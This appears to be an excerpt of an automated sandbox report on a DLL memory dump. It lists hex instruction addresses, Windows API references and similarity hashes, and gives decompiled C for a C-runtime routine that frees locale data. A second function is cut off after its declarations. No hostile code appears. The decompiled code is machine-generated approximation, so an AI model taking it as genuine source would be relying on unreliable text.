0x6e7db0db
0x6e7db0dd
0x6e7db0e2
0x6e7db0e7
0x6e7db0e8
0x6e7db0ea
0x6e7db0ec
0x6e7db0ee
0x6e7db0f0
0x6e7db0f2
0x6e7db0f5
0x6e7db0f7
0x6e7db0f7
0x6e7db0fd
0x6e7db100
0x6e7db102
0x6e7db105
0x6e7db10a
0x6e7db10d
0x6e7db10d
0x6e7db114
0x6e7db117
0x6e7db11c
0x6e7db11c
0x6e7db0ec
0x6e7db11f
0x6e7db11f
0x6e7db126
0x6e7db128
0x6e7db131
0x6e7db132
0x6e7db135
0x6e7db13a
0x6e7db13e
0x6e7db140
0x6e7db142
0x6e7db157
0x6e7db157
0x6e7db144
0x6e7db144
0x6e7db147
0x6e7db149
0x6e7db152
0x6e7db152
0x6e7db149
0x6e7db15a
0x6e7db162
0x6e7db165
0x6e7db168
0x6e7db16b
0x6e7db16d
0x6e7db172
0x6e7db177
0x6e7db178
0x6e7db17a
0x6e7db17c
0x6e7db17e
0x6e7db180
0x6e7db182
0x6e7db185
0x6e7db187
0x6e7db187
0x6e7db18d
0x6e7db190
0x6e7db192
0x6e7db195
0x6e7db19a
0x6e7db19d
0x6e7db19d
0x6e7db1a4
0x6e7db1a7
0x6e7db1ac
0x6e7db1ac
0x6e7db17c
0x6e7db1af
0x6e7db1af
0x6e7db16d
0x6e7db1b6
0x6e7db1ba
0x6e7db1c0
0x6e7db1c3
0x6e7db1c5
0x6e7db1ca
0x6e7db1cf
0x6e7db1d0
0x6e7db1d2
0x6e7db1d4
0x6e7db1d6
0x6e7db1d9
0x6e7db1db
0x6e7db1db
0x6e7db1e1
0x6e7db1e4
0x6e7db1e6
0x6e7db1e9
0x6e7db1ee
0x6e7db1f1
0x6e7db1f1
0x6e7db1f8
0x6e7db1fb
0x6e7db200
0x6e7db200
0x6e7db1d0
0x6e7db203
0x6e7db20a
0x6e7db210
0x6e7db215
0x6e7db218
0x6e7db219
0x6e7db21c
0x6e7db21f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7db21f
0x6e7dafa0
0x6e7daf6a
0x6e7daf58
0x6e7daf4d
0x6e7daf3b
0x00000000
0x6e7daf25
0x00000000
0x6e7daef0
0x6e7daedf
0x6e7daeca
0x6e7daeb8
0x6e7daead
0x6e7da786
0x6e7da78e
0x6e7da792
0x6e7da798
0x6e7da79b
0x6e7da7a0
0x6e7da7a3
0x6e7da7a5
0x6e7da7a7
0x6e7da807
0x6e7da7a9
0x6e7da7ac
0x6e7da7b1
0x6e7da7b2
0x6e7da7f8
0x6e7da7f8
0x6e7da7fe
0x6e7da7b4
0x6e7da7b4
0x6e7da7b6
0x00000000
0x6e7da7b8
0x6e7da7b8
0x6e7da7ba
0x6e7da7c0
0x6e7da7c2
0x6e7da7c5
0x6e7da7c7
0x6e7da7c7
0x6e7da7cd
0x6e7da7d0
0x6e7da7d2
0x6e7da7d5
0x6e7da7da
0x6e7da7dd
0x6e7da7dd
0x6e7da7e4
0x6e7da7e7
0x6e7da7ec
0x6e7da7ef
0x6e7da7ef
0x6e7da7b6
0x6e7da7b2
0x6e7da80d
0x6e7da80f
0x6e7da8b1
0x6e7da8b7
0x6e7da8ba
0x6e7da8bf
0x6e7da8c2
0x6e7da8c4
0x6e7da8c6
0x6e7da8cb
0x6e7da8d0
0x6e7da8d1
0x6e7da8d3
0x6e7da8d5
0x6e7da8d7
0x6e7da8d9
0x6e7da8db
0x6e7da8de
0x6e7da8e0
0x6e7da8e0
0x6e7da8e6
0x6e7da8e9
0x6e7da8eb
0x6e7da8ee
0x6e7da8f3
0x6e7da8f6
0x6e7da8f6
0x6e7da8fd
0x6e7da900
0x6e7da905
0x6e7da905
0x6e7da8d5
0x6e7da908
0x6e7da908
0x6e7da90f
0x6e7da911
0x6e7da9bb
0x6e7da9c1
0x6e7da9c4
0x6e7da9c9
0x6e7da9cc
0x6e7da9ce
0x6e7da9d0
0x6e7da9d5
0x6e7da9da
0x6e7da9db
0x6e7da9dd
0x6e7da9df
0x6e7da9e1
0x6e7da9e3
0x6e7da9e5
0x6e7da9e8
0x6e7da9ea
0x6e7da9ea
0x6e7da9f0
0x6e7da9f3
0x6e7da9f5
0x6e7da9f8
0x6e7da9fd
0x6e7daa00
0x6e7daa00
0x6e7daa07
0x6e7daa0a
0x6e7daa0f
0x6e7daa0f
0x6e7da9df
0x6e7daa12
0x6e7daa12
0x6e7daa19
0x6e7daa1b
0x6e7daaba
0x6e7daac0
0x6e7daac3
0x6e7daac8
0x6e7daacb
0x6e7daacd
0x6e7daacf
0x6e7daad4
0x6e7daad9
0x6e7daada
0x6e7daadc
0x6e7daade
0x6e7daae0
0x6e7daae2
0x6e7daae4
0x6e7daae7
0x6e7daae9
0x6e7daae9
0x6e7daaef
0x6e7daaf2
0x6e7daaf4
0x6e7daaf7
0x6e7daafc
0x6e7daaff
0x6e7daaff
0x6e7dab06
0x6e7dab09
0x6e7dab0e
0x6e7dab0e
0x6e7daade
0x6e7dab11
0x6e7dab11
0x6e7dab18
0x6e7dab1a
0x6e7daba1
0x6e7daba7
0x6e7dabaa
0x6e7dabaf
0x6e7dabb2
0x6e7dabb4
0x6e7dabb6
0x6e7dabbb
0x6e7dabc0
0x6e7dabc1
0x6e7dabc3
0x6e7dabc5
0x6e7dabc7
0x6e7dabc9
0x6e7dabcb
0x6e7dabce
0x6e7dabd0
0x6e7dabd0
0x6e7dabd6
0x6e7dabd9
0x6e7dabdb
0x6e7dabde
0x6e7dabe3
0x6e7dabe6
0x6e7dabe6
0x6e7dabed
0x6e7dabf0
0x6e7dabf5
0x6e7dabf5
0x6e7dabc5
0x6e7dabf8
0x6e7dabf8
0x6e7dabff
0x6e7dac01
0x6e7dac88
0x6e7dac8e
0x6e7dac91
0x6e7dac96
0x6e7dac99
0x6e7dac9b
0x6e7dac9d
0x6e7daca2
0x6e7daca7
0x6e7daca8
0x6e7dacaa
0x6e7dacac
0x6e7dacae
0x6e7dacb0
0x6e7dacb2
0x6e7dacb5
0x6e7dacb7
0x6e7dacb7
0x6e7dacbd
0x6e7dacc0
0x6e7dacc2
0x6e7dacc5
0x6e7dacca
0x6e7daccd
0x6e7daccd
0x6e7dacd4
0x6e7dacd7
0x6e7dacdc
0x6e7dacdc
0x6e7dacac
0x6e7dacdf
0x6e7dacdf
0x6e7dace6
0x6e7dace8
0x6e7daced
0x6e7dacf4
0x6e7dacfb
0x6e7dad05
0x6e7dad0d
0x6e7dad10
0x6e7dad16
0x6e7dad19
0x6e7dad1b
0x6e7dad20
0x6e7dad25
0x6e7dad26
0x6e7dad28
0x6e7dad2a
0x6e7dad2c
0x6e7dad2e
0x6e7dad30
0x6e7dad33
0x6e7dad35
0x6e7dad35
0x6e7dad3b
0x6e7dad3e
0x6e7dad40
0x6e7dad43
0x6e7dad48
0x6e7dad4b
0x6e7dad4b
0x6e7dad52
0x6e7dad55
0x6e7dad5a
0x6e7dad5a
0x6e7dad2a
0x6e7dad5d
0x6e7dad5d
0x6e7dad1b
0x6e7dac03
0x6e7dac06
0x6e7dac0a
0x6e7dac11
0x6e7dac1b
0x6e7dac23
0x6e7dac26
0x6e7dac29
0x6e7dac2c
0x6e7dac2e
0x6e7dac37
0x6e7dac3c
0x6e7dac3d
0x6e7dac3f
0x6e7dac41
0x6e7dac43
0x6e7dac45
0x6e7dac47
0x6e7dac4a
0x6e7dac4c
0x6e7dac4c
0x6e7dac52
0x6e7dac55
0x6e7dac57
0x6e7dac5a
0x6e7dac5f
0x6e7dac62
0x6e7dac62
0x6e7dac69
0x6e7dac6c
0x6e7dac71
0x6e7dac71
0x6e7dac41
0x6e7dac74
0x6e7dac74
0x6e7dac2e
0x6e7dab1c
0x6e7dab1f
0x6e7dab23
0x6e7dab2a
0x6e7dab34
0x6e7dab39
0x6e7dab3c
0x6e7dab3f
0x6e7dab42
0x6e7dab45
0x6e7dab47
0x6e7dab50
0x6e7dab55
0x6e7dab56
0x6e7dab58
0x6e7dab5a
0x6e7dab5c
0x6e7dab5e
0x6e7dab60
0x6e7dab63
0x6e7dab65
0x6e7dab65
0x6e7dab6b
0x6e7dab6e
0x6e7dab70
0x6e7dab73
0x6e7dab78
0x6e7dab7b
0x6e7dab7b
0x6e7dab82
0x6e7dab85
0x6e7dab8a
0x6e7dab8a
0x6e7dab5a
0x6e7dab8d
0x6e7dab8d
0x6e7dab47
0x6e7daa21
0x6e7daa24
0x6e7daa28
0x6e7daa2d
0x6e7daa31
0x6e7daa33
0x6e7daa35
0x6e7daa3b
0x6e7daa3b
0x6e7daa37
0x6e7daa37
0x6e7daa37
0x6e7daa3d
0x6e7daa3f
0x6e7daa42
0x6e7daa42
0x6e7daa45
0x6e7daa48
0x6e7daa48
0x6e7daa51
0x6e7daa56
0x6e7daa5b
0x6e7daa5e
0x6e7daa60
0x6e7daa69
0x6e7daa6e
0x6e7daa6f
0x6e7daa71
0x6e7daa73
0x6e7daa75
0x6e7daa77
0x6e7daa79
0x6e7daa7c
0x6e7daa7e
0x6e7daa7e
0x6e7daa84
0x6e7daa87
0x6e7daa89
0x6e7daa8c
0x6e7daa91
0x6e7daa94
0x6e7daa94
0x6e7daa9b
0x6e7daa9e
0x6e7daaa3
0x6e7daaa3
0x6e7daa73
0x6e7daaa6
0x6e7daaa6
0x6e7daa60
0x6e7da917
0x6e7da91a
0x6e7da91e
0x6e7da923
0x6e7da927
0x6e7da929
0x6e7da92b
0x6e7da931
0x6e7da931
0x6e7da92d
0x6e7da92d
0x6e7da92d
0x6e7da933
0x6e7da935
0x6e7da940
0x6e7da940
0x6e7da943
0x6e7da946
0x6e7da946
0x6e7da94f
0x6e7da957
0x6e7da95c
0x6e7da95f
0x6e7da961
0x6e7da96a
0x6e7da96f
0x6e7da970
0x6e7da972
0x6e7da974
0x6e7da976
0x6e7da978
0x6e7da97a
0x6e7da97d
0x6e7da97f
0x6e7da97f
0x6e7da985
0x6e7da988
0x6e7da98a
0x6e7da98d
0x6e7da992
0x6e7da995
0x6e7da995
0x6e7da99c
0x6e7da99f
0x6e7da9a4
0x6e7da9a4
0x6e7da974
0x6e7da9a7
0x6e7da9a7
0x6e7da961
0x6e7da815
0x6e7da818
0x6e7da81c
0x6e7da821
0x6e7da825
0x6e7da827
0x6e7da829
0x6e7da82f
0x6e7da82f
0x6e7da82b
0x6e7da82b
0x6e7da82b
0x6e7da831
0x6e7da833
0x6e7da836
0x6e7da836
0x6e7da839
0x6e7da83c
0x6e7da83c
0x6e7da845
0x6e7da84d
0x6e7da852
0x6e7da855
0x6e7da857
0x6e7da860
0x6e7da865
0x6e7da866
0x6e7da868
0x6e7da86a
0x6e7da86c
0x6e7da86e
0x6e7da870
0x6e7da873
0x6e7da875
0x6e7da875
0x6e7da87b
0x6e7da87e
0x6e7da880
0x6e7da883
0x6e7da888
0x6e7da88b
0x6e7da88b
0x6e7da892
0x6e7da895
0x6e7da89a
0x6e7da89a
0x6e7da86a
0x6e7da89d
0x6e7da89d
0x6e7da857
0x6e7dad67
0x6e7dad6b
0x6e7dad71
0x6e7dad74
0x6e7dad76
0x6e7dad7b
0x6e7dad80
0x6e7dad81
0x6e7dad83
0x6e7dad85
0x6e7dad87
0x6e7dad8a
0x6e7dad8c
0x6e7dad8c
0x6e7dad92
0x6e7dad95
0x6e7dad97
0x6e7dad9a
0x6e7dad9f
0x6e7dada2
0x6e7dada2
0x6e7dada9
0x6e7dadac
0x6e7dadb1
0x6e7dadb1
0x6e7dad81
0x6e7dadb4
0x6e7dadbb
0x6e7dadc1
0x6e7dadc6
0x6e7dadc9
0x6e7dadca
0x6e7dadcd
0x6e7dadd0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7dadd0
0x6e7da780
0x6e7da74a
0x6e7da738
0x6e7da72d
0x6e7da71b
0x00000000
0x6e7da705
0x00000000
0x6e7da6d0
0x6e7da6bf
0x6e7da6aa
0x6e7da698
0x6e7da68d
0x6e7da571
0x6e7da571
0x00000000
0x6e7da571
0x6e7da56b
0x6e7da55b
0x6e7d9bef
0x6e7d9bfa
0x6e7d9bfe
0x6e7d9c04
0x6e7d9c07
0x6e7d9c0c
0x6e7d9c12
0x6e7d9c18
0x6e7d9c1a
0x6e7d9c1f
0x6e7d9c24
0x6e7d9c25
0x6e7d9c27
0x6e7d9c29
0x6e7d9c2b
0x6e7d9c2d
0x6e7d9c2f
0x6e7d9c32
0x6e7d9c34
0x6e7d9c34
0x6e7d9c3a
0x6e7d9c3d
0x6e7d9c3f
0x6e7d9c42
0x6e7d9c47
0x6e7d9c4a
0x6e7d9c4a
0x6e7d9c51
0x6e7d9c54
0x6e7d9c59
0x6e7d9c5f
0x6e7d9c5f
0x6e7d9c29
0x6e7d9c62
0x6e7d9c62
0x6e7d9c6c
0x6e7d9c6e
0x6e7d9d24
0x6e7d9d2a
0x6e7d9d2d
0x6e7d9d32
0x6e7d9d38
0x6e7d9d3e
0x6e7d9d40
0x6e7d9d45
0x6e7d9d4a
0x6e7d9d4b
0x6e7d9d4d
0x6e7d9d4f
0x6e7d9d51
0x6e7d9d53
0x6e7d9d55
0x6e7d9d58
0x6e7d9d5a
0x6e7d9d5a
0x6e7d9d60
0x6e7d9d63
0x6e7d9d65
0x6e7d9d68
0x6e7d9d6d
0x6e7d9d70
0x6e7d9d70
0x6e7d9d77
0x6e7d9d7a
0x6e7d9d7f
0x6e7d9d85
0x6e7d9d85
0x6e7d9d4f
0x6e7d9d88
0x6e7d9d88
0x6e7d9d92
0x6e7d9d94
0x6e7d9e3b
0x6e7d9e41
0x6e7d9e44
0x6e7d9e49
0x6e7d9e4f
0x6e7d9e55
0x6e7d9e57
0x6e7d9e5c
0x6e7d9e61
0x6e7d9e62
0x6e7d9e64
0x6e7d9e66
0x6e7d9e68
0x6e7d9e6a
0x6e7d9e6c
0x6e7d9e6f
0x6e7d9e71
0x6e7d9e71
0x6e7d9e77
0x6e7d9e7a
0x6e7d9e7c
0x6e7d9e7f
0x6e7d9e84
0x6e7d9e87
0x6e7d9e87
0x6e7d9e8e
0x6e7d9e91
0x6e7d9e96
0x6e7d9e9c
0x6e7d9e9c
0x6e7d9e66
0x6e7d9e9f
0x6e7d9e9f
0x6e7d9ea9
0x6e7d9eab
0x6e7d9f52
0x6e7d9f58
0x6e7d9f5b
0x6e7d9f60
0x6e7d9f66
0x6e7d9f6c
0x6e7d9f6e
0x6e7d9f73
0x6e7d9f78
0x6e7d9f79
0x6e7d9f7b
0x6e7d9f7d
0x6e7d9f7f
0x6e7d9f81
0x6e7d9f83
0x6e7d9f86
0x6e7d9f88
0x6e7d9f88
0x6e7d9f8e
0x6e7d9f91
0x6e7d9f93
0x6e7d9f96
0x6e7d9f9b
0x6e7d9f9e
0x6e7d9f9e
0x6e7d9fa5
0x6e7d9fa8
0x6e7d9fad
0x6e7d9fb3
0x6e7d9fb3
0x6e7d9f7d
0x6e7d9fb6
0x6e7d9fb6
0x6e7d9fc0
0x6e7d9fc2
0x6e7da063
0x6e7da069
0x6e7da06c
0x6e7da071
0x6e7da077
0x6e7da07d
0x6e7da07f
0x6e7da084
0x6e7da089
0x6e7da08a
0x6e7da08c
0x6e7da08e
0x6e7da090
0x6e7da092
0x6e7da094
0x6e7da097
0x6e7da099
0x6e7da099
0x6e7da09f
0x6e7da0a2
0x6e7da0a4
0x6e7da0a7
0x6e7da0ac
0x6e7da0af
0x6e7da0af
0x6e7da0b6
0x6e7da0b9
0x6e7da0be
0x6e7da0c4
0x6e7da0c4
0x6e7da08e
0x6e7da0c7
0x6e7da0c7
0x6e7da0d1
0x6e7da0d3
0x6e7da0dc
0x6e7da0e3
0x6e7da0ea
0x6e7da0f4
0x6e7da0f9
0x6e7da0ff
0x6e7da102
0x6e7da108
0x6e7da10b
0x6e7da10d
0x6e7da112
0x6e7da117
0x6e7da118
0x6e7da11a
0x6e7da11c
0x6e7da11e
0x6e7da120
0x6e7da122
0x6e7da125
0x6e7da127
0x6e7da127
0x6e7da12d
0x6e7da130
0x6e7da132
0x6e7da135
0x6e7da13a
0x6e7da13d
0x6e7da13d
0x6e7da144
0x6e7da147
0x6e7da14c
0x6e7da14c
0x6e7da11c
0x6e7da14f
0x6e7da14f
0x6e7da10d
0x6e7d9fc8
0x6e7d9fcb
0x6e7d9fd7
0x6e7d9fd9
0x6e7d9fdb
0x6e7d9fe1
0x6e7d9fe1
0x6e7d9fdd
0x6e7d9fdd
0x6e7d9fdd
0x6e7d9ff3
0x6e7d9ff8
0x6e7d9ffe
0x6e7da001
0x6e7da003
0x6e7da00c
0x6e7da011
0x6e7da012
0x6e7da014
0x6e7da016
0x6e7da018
0x6e7da01a
0x6e7da01c
0x6e7da01f
0x6e7da021
0x6e7da021
0x6e7da027
0x6e7da02a
0x6e7da02c
0x6e7da02f
0x6e7da034
0x6e7da037
0x6e7da037
0x6e7da03e
0x6e7da041
0x6e7da046
0x6e7da046
0x6e7da016
0x6e7da049
0x6e7da049
0x6e7da003
0x6e7d9eb1
0x6e7d9eb4
0x6e7d9ec0
0x6e7d9ec2
0x6e7d9ec4
0x6e7d9eca
0x6e7d9eca
0x6e7d9ec6
0x6e7d9ec6
0x6e7d9ec6
0x6e7d9ed2
0x6e7d9edd
0x6e7d9ee0
0x6e7d9ee6
0x6e7d9eeb
0x6e7d9eee
0x6e7d9ef0
0x6e7d9efb
0x6e7d9f00
0x6e7d9f01
0x6e7d9f03
0x6e7d9f05
0x6e7d9f07
0x6e7d9f09
0x6e7d9f0b
0x6e7d9f0e
0x6e7d9f10
0x6e7d9f10
0x6e7d9f16
0x6e7d9f19
0x6e7d9f1b
0x6e7d9f1e
0x6e7d9f23
0x6e7d9f26
0x6e7d9f26
0x6e7d9f2d
0x6e7d9f30
0x6e7d9f35
0x6e7d9f35
0x6e7d9f05
0x6e7d9f38
0x6e7d9f38
0x6e7d9ef0
0x6e7d9d9a
0x6e7d9d9d
0x6e7d9da9
0x6e7d9dab
0x6e7d9dad
0x6e7d9db3
0x6e7d9db3
0x6e7d9daf
0x6e7d9daf
0x6e7d9daf
0x6e7d9dbb
0x6e7d9dc6
0x6e7d9dc9
0x6e7d9dcf
0x6e7d9dd4
0x6e7d9dd7
0x6e7d9dd9
0x6e7d9de4
0x6e7d9de9
0x6e7d9dea
0x6e7d9dec
0x6e7d9dee
0x6e7d9df0
0x6e7d9df2
0x6e7d9df4
0x6e7d9df7
0x6e7d9df9
0x6e7d9df9
0x6e7d9dff
0x6e7d9e02
0x6e7d9e04
0x6e7d9e07
0x6e7d9e0c
0x6e7d9e0f
0x6e7d9e0f
0x6e7d9e16
0x6e7d9e19
0x6e7d9e1e
0x6e7d9e1e
0x6e7d9dee
0x6e7d9e21
0x6e7d9e21
0x6e7d9dd9
0x6e7d9c74
0x6e7d9c77
0x6e7d9c7e
0x6e7d9c83
0x6e7d9c87
0x6e7d9c89
0x6e7d9c8b
0x6e7d9c91
0x6e7d9c91
0x6e7d9c8d
0x6e7d9c8d
0x6e7d9c8d
0x6e7d9c93
0x6e7d9c95
0x6e7d9c95
0x6e7d9c95
0x6e7d9ca0
0x6e7d9ca0
0x6e7d9ca3
0x6e7d9ca6
0x6e7d9ca9
0x00000000
0x6e7d9cab
0x6e7d9caf
0x6e7d9cb7
0x6e7d9cbc
0x6e7d9cc2
0x6e7d9cc4
0x6e7d9ccd
0x6e7d9cd2
0x6e7d9cd3
0x6e7d9cd5
0x6e7d9cd7
0x6e7d9cd9
0x6e7d9cdb
0x6e7d9cdd
0x6e7d9ce0
0x6e7d9ce2
0x6e7d9ce2
0x6e7d9ce8
0x6e7d9ceb
0x6e7d9ced
0x6e7d9cf0
0x6e7d9cf5
0x6e7d9cf8
0x6e7d9cf8
0x6e7d9cff
0x6e7d9d02
0x6e7d9d07
0x6e7d9d07
0x6e7d9cd7
0x6e7d9d0a
0x6e7d9d0a
0x6e7d9cc4
0x6e7d9ca9
0x6e7da159
0x6e7da15d
0x6e7da163
0x6e7da166
0x6e7da168
0x6e7da16d
0x6e7da172
0x6e7da173
0x6e7da175
0x6e7da177
0x6e7da179
0x6e7da17c
0x6e7da17e
0x6e7da17e
0x6e7da184
0x6e7da187
0x6e7da189
0x6e7da18c
0x6e7da191
0x6e7da194
0x6e7da194
0x6e7da19b
0x6e7da19e
0x6e7da1a3
0x6e7da1a3
0x6e7da173
0x6e7da1a6
0x6e7da1ad
0x6e7da1b5
0x6e7da1b6
0x6e7da1bc
0x6e7da1bf
0x00000000
0x6e7da1c1
0x6e7da1c1
0x00000000
0x6e7da1c1
0x6e7da1bf
0x6e7d9be9
0x6e7d9bb0
0x6e7d9b9b
0x6e7d9b90
0x6e7d9b7e
0x00000000
0x6e7d9b68
0x00000000
0x6e7d9b30
0x6e7d9b26
0x6e7d9b08
0x6e7d9af6
0x6e7d9aeb
0x6e7d9a4c
0x6e7d9a4c
0x00000000
0x6e7d9a4c
0x6e7d9a4a
0x6e7d9a3a
0x6e7d99f4
0x6e7d99f4
0x00000000
0x6e7d99f4
0x6e7d99f2
0x6e7d99e2
0x00000000
0x00000000
0x00000000
0x6e7d98a3
0x6e7d9893
0x6e7d987f
0x6e7d97b4
0x6e7d978f
0x6e7d9787
0x6e7d976c
0x00000000
0x6e7d973f
0x00000000
0x6e7d9720
0x6e7d970f
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,77DCEE0D,76E3D5B0,00000000), ref: 6E7D9754
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E7D9762
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,77DCEE0D,76E3D5B0,00000000), ref: 6E7D977F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E7D97A0
SysFreeString.OLEAUT32(00000000), ref: 6E7D97AF
SysFreeString.OLEAUT32(00000000), ref: 6E7D9936
SysFreeString.OLEAUT32(00000000), ref: 6E7D9988
_com_issue_error.COMSUPP ref: 6E7D9996
SysFreeString.OLEAUT32(76E3D5B0), ref: 6E7D999C

Strings

8, xrefs: 6E7D985F
Arial, xrefs: 6E7D97C5
line, xrefs: 6E7D974B, 6E7D9776

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: 3224b4f4f03c361b8676039314ecd49a7c38f4a46abc94715250fac36b9a047f
Instruction ID: 60b149f24396a0d1e72d01c19e91ad9cdd3dc2c4d1842a8facf73c850da8eab2
Opcode Fuzzy Hash: 3224b4f4f03c361b8676039314ecd49a7c38f4a46abc94715250fac36b9a047f
Instruction Fuzzy Hash: 85A1E930900249DFDB10CFE4CA58BEEBBB9EF99314F10455CE455AB3A0DB749A09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E802374, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E802374(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e81e0b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E7F9268(_t46);
							E6E803B8E( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E7F9268(_t47);
							E6E804048( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E7F9268( *((intOrPtr*)(_t74 + 0x7c)));
						E6E7F9268( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E7F9268( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E7F9268( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E7F9268( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E7F9268( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E8024E7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0x19f
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x127
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e81e2b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E7F9268(_t31);
							E6E7F9268( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E7F9268(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E7F9268(_t74);
			}

0x6e80237c
0x6e802380
0x6e802388
0x6e802391
0x6e802396
0x6e80239d
0x6e8023a5
0x6e8023ad
0x6e8023b8
0x6e8023be
0x6e8023bf
0x6e8023c7
0x6e8023cf
0x6e8023da
0x6e8023e0
0x6e8023e4
0x6e8023ef
0x6e8023f5
0x6e802396
0x6e8023f6
0x6e8023fe
0x6e802411
0x6e802424
0x6e802432
0x6e80243d
0x6e802442
0x6e80244b
0x6e802453
0x6e802454
0x6e802454
0x6e80245a
0x6e80245d
0x6e80245d
0x6e802460
0x6e802467
0x6e802469
0x6e80246d
0x6e802475
0x6e80247c
0x6e802482
0x6e802483
0x6e802483
0x6e80248a
0x6e80248c
0x6e802491
0x6e802499
0x6e80249e
0x6e80249f
0x6e80249f
0x6e8024a2
0x6e8024a5
0x6e8024a8
0x6e8024ab
0x6e8024ab
0x6e8024bd

APIs

___free_lconv_mon.LIBCMT ref: 6E8023B8

Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BAB
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BBD
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BCF
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BE1
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BF3
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C05
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C17
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C29
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C3B
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C4D
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C5F
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C71
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C83

_free.LIBCMT ref: 6E8023AD

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E8023CF
_free.LIBCMT ref: 6E8023E4
_free.LIBCMT ref: 6E8023EF
_free.LIBCMT ref: 6E802411
_free.LIBCMT ref: 6E802424
_free.LIBCMT ref: 6E802432
_free.LIBCMT ref: 6E80243D
_free.LIBCMT ref: 6E802475
_free.LIBCMT ref: 6E80247C
_free.LIBCMT ref: 6E802499
_free.LIBCMT ref: 6E8024B1

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: cdca83b266b0b7807d833ab787e42ef9e089152c0f84775968ef08c96b7cca1d
Instruction ID: 3abc44488af1c0b75189689d50382a936ac0b64b050c3096c20c32a11d5117bf
Opcode Fuzzy Hash: cdca83b266b0b7807d833ab787e42ef9e089152c0f84775968ef08c96b7cca1d
Instruction Fuzzy Hash: 5E315931608605DFEB649EE9DE44B8A73ACAF10224F114D19E468D76A1DBB9A880CB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E803C8C, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E803C8C(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
